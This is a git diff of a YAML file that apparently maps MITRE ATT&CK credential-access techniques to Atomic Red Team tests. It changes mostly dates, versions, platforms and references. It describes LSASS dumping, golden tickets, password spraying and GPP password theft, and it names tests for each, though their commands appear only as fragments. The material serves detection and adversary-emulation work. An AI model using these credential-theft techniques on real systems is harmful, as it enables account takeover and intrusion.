         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -76404,6 +77168,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -76416,7 +77181,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -76466,7 +77231,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests:
     - name: Dump LSASS.exe Memory using ProcDump
@@ -76953,7 +77717,7 @@ credential-access:
         elevation_required: true
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -76979,6 +77743,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -76994,18 +77759,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -77032,9 +77797,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests:
     - name: Password Spray all Domain Users
@@ -77252,7 +78014,7 @@ credential-access:
           password132 \n"
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -77263,13 +78025,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -77283,6 +78045,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -77293,12 +78056,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -77373,7 +78136,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests:
     - name: Cached Credential Dump via Cmdkey
@@ -77435,7 +78197,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -77470,8 +78232,6 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests:
     - name: Crafting Active Directory golden tickets with mimikatz
@@ -77637,10 +78397,10 @@ credential-access:
           $env:TEMP\\golden.txt -ErrorAction Ignore\n"
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -77650,21 +78410,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -77713,9 +78475,6 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests:
     - name: Staging Local Certificates via Export-Certificate
@@ -77740,26 +78499,7 @@ credential-access:
         name: powershell
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -77774,25 +78514,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -77866,7 +78624,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests:
     - name: Extracting passwords with findstr
@@ -78061,11 +78818,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -78114,6 +78870,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -78122,6 +78879,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -78132,13 +78890,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -78194,44 +78953,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -78248,20 +78974,49 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests:
     - name: GPP Passwords (findstr)
@@ -78340,7 +79095,7 @@ credential-access:
         name: powershell
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -78415,11 +79170,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -78463,11 +79217,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -78491,8 +79244,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -78508,11 +79261,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -78523,11 +79275,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -78537,16 +79291,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -78584,13 +79338,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -78599,6 +79350,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -78606,11 +79358,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -78628,13 +79380,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -78647,6 +79396,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -78660,12 +79410,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -78697,17 +79448,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -78780,7 +79528,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests:
     - name: PowerShell - Prompt User for Password
@@ -78801,7 +79548,7 @@ credential-access:
         name: powershell
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -78810,6 +79557,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -78828,18 +79576,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -78863,13 +79611,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
